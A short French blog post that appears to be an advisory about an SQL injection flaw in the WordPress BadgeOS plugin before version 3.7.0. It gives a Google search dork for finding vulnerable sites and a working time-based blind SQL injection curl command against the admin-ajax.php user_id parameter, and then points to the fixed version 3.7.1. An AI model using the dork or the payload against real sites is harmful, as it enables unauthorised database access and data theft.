WordPress est un CMS bien connu sur internet, bien que plutôt sécurisé, sa grande force et aussi sa plus grande faiblesse … les plugins.
Le plugin BagdeOs vient d’avoir une faille CVE de type injection SQL publiée.
Les versions impactées sont < 3.7.0
Le problème vient du fait que certains paramètres comme par exemple la variable user ne sont pas bien filtrés.
Grace un simple GHDB on peut trouver facilement des sites vulnérables
inurl: "/wp-content/plugins/badgeos"
Exploitation de la faille CVE BadgeOS
curl 'https://example.com/wp-admin/admin-ajax.php' --data 'action=get-achievements&total_only=true&user_id=11 AND (SELECT 9628 FROM (SELECT(SLEEP(5)))WOrh)-- KUsb'
Régler le problème de la faille CVE BadgeOS
Bien qu’à l’heure ou j’écris cette article le plugin est toujours désactiver dans le gestionnaire de plugin WordPress, BagdeOs ont publié sur leur site une nouvelle version, la 3.7.1 qui corrige le problème.
A vous de faire la mise à jour !!!
